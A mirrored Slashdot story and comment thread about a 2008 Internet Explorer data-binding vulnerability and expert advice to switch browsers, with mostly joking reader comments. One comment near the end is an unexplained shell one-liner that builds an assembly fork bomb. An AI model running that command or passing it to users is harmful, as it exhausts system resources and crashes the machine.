Slashdot Mirror
Experts Say To Switch Browsers In Light of IE Vulnerability
It appears that the exploit in IE briefly mentioned a few days ago is causing a serious reaction: SteveAU writes "Microsoft has begun flooding media outlets with information advising users to switch to an alternate browser while a serious security flaw is being patched. The flaw, which affects all versions of Microsoft Internet Explorer, is manifested via malware and has infected over 6,000 sites thus far. Microsoft states: 'The vulnerability exists as an invalid pointer reference in the data-binding function of Internet Explorer. When data binding is enabled (which is the default state), it is possible under certain conditions for an object to be released without updating the array length, leaving the potential to access the deleted object's memory space. This can cause Internet Explorer to exit unexpectedly, in a state that is exploitable.'" According to the BBC report, though, Microsoft itself is only asking that users be "vigilant while it investigated and prepared an emergency patch"; it's outside experts who say to dump IE (at least for now).
Update: 12/16 21:11 GMT by KD : Microsoft will issue an emergency critical update for IE tomorrow.
Update: 12/16 21:11 GMT by KD : Microsoft will issue an emergency critical update for IE tomorrow.
Whoa what happened to Slashdot's main page...
This story's title header was red.. Is that like "woop woop warning warning" red? Or something else?
Water still wet.
Pope still Catholic.
Yea but the ones that they support and frequently think it's a good idea to click on the 'Hit the target to get a free iPod' ad is a good idea.
I won one of these a few days ago. Just to let you know, they don't actually give you an iPod directly. Instead, they ask for your bank account information and deposit $250 (they say it's for tax purposes). I should be getting my money any day now!
The Links browser? Stallman knows what's up! What do you guys think, Lynx or Links? I prefer Links, just seems easier to use to me. Lynx actually did have a vulnerability disclosed in October, http://web.nvd.nist.gov/view/vuln/detail;jsessionid=031729623a47404f1389622ff35a?execution=e1s1. That damn Lynx has just gotten too mainstream to be safe these days!
It's sort of like wearing a web-condom: used to be that going bare-browser was mostly safe as long as you were careful who you interacted with, but nowadays even the pretty ones can burn you, so your best bet is to just wrap your tool ... with a sandbox. (I'm still working on the analogy)
Try adding a reference to "extensions". That'll help.
My wife has just come over to me (she listens to Radio 1) and told me that I need to install another browser on all our machines.. I guess she has never noticed that we are a Ubuntu household!! At least the message is getting across to normal non techie users at the moment that IE is bad..
My laptop has an older IE; version 5 I believe..... will this flaw affect that too, or is it just a flaw in the current version of IE?
FOX NEWS.com should be BANNED from television and internet. Have the Congress take it over and give us Truespeak.
Especially since it happens nearly every day. Oh noes!!!! Everybody panic!!! Another exploit in Windows/Office/Explorer. WOE is us!!!
Perhaps if we phrased it like a sponsored ad: "Todays exploit brought to you by yet another buffer overflow error!" "This morning's gaping security hole sponsored by Stormworm. Stormworm: The worm of choice for the discerning mailbot."
Help stamp out iliturcy.
And since then, they've also learned how to make anti-spyware apps that distinguish between real spyware and cookies that just track what websites you go to for advertising purposes.
Aaaah I didnt realise I was jumping forward in time before running anti-apyware after browsing with FF :)
Choosing a browser with security as the only concern? Opera.
"Eeeeverybody's getting secure browsers!"
"You get a secure browser!"
"YOU get a secure browser!"
"You get a secure browser!"
...use separate sandboxed browsers for finance vs email vs ... vs porn browsing.
Fixed that for you.
I only post comments when someone on the internet is wrong.
This is to prevent unfit users from not using one of the other browsae.
for everyone's sake, I hope that's a fucking typo.
Stop Computers/Cars Analogies on S
It seems that I will have to reformat my hard drive and install everything to get rid of this problem.
Close, but no cigar. To get rid of this problem, you will have to reformat your hard drive and not install everything.
Really it's not that simple. I was a supporter of firefox in my organization, and to my surprise I pretty much won. We use Firefox for nearly everything. Nearly. I have content adviser turned on for each of the machines which for the most part cripples IE and makes it nearly impossible to actually browse the web. IE is still very necessary for many sites which are required for our operation. Not internal "we developed in house badly designed pages", but actual corporate sites to manage various accounts on the Internet. That's surprising in 2008 that companies could have their head stuck in the sand that badly, but they seem to be all over the place... and unfortunately in places required for essential function.
I'm fortunate that the medium sized company goes along with this, because in any other organization we'd just use IE and that would be the end of it. Just managing the work arounds has actually been a lot of work, although in my mind it comes out to a wash in being a bit more proactive in preventing the vulnerabilities that flood IE.
You can do much better than that. I duct tape huge boxing gloves to my users hands, that way they can't type malware in using a notepad and Alt key codes. I've also banned people carrying in USB peripherals (might have malware), laptops (might have malware), mobile phones (distracting and pointless) and A4 binders (might have malware written out as a long list of Alt key codes). I've also removed all the phones (someone might whistle malware down the phone to a 56K modem). Though I've covered all the ports, USB, network, modem and so on with epoxy resin. Still I believe in defense in depth.
Some of my users have found out how to remove the gloves with their teeth, even though my security guards will beat anyone they see trying to do that. I've asked the CEO if I can amputate their hands and leave them with bandaged stumps but he obviously was too 'non technical' to understand. He just shook his head and walked off. Maybe muzzling persistent rule breakers after the third beating would be a acceptable. Actually I want to muzzle and blindfold everyone all the time and cut off the power. Still, even though the solution I have is not perfect it is very secure.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
This is to prevent unfit users from not using one of the other browsae.
for everyone's sake, I hope that's a fucking typo.
No it's not a typo, there are many wordae like that.
8 of 13 people found this answer helpful. Did you?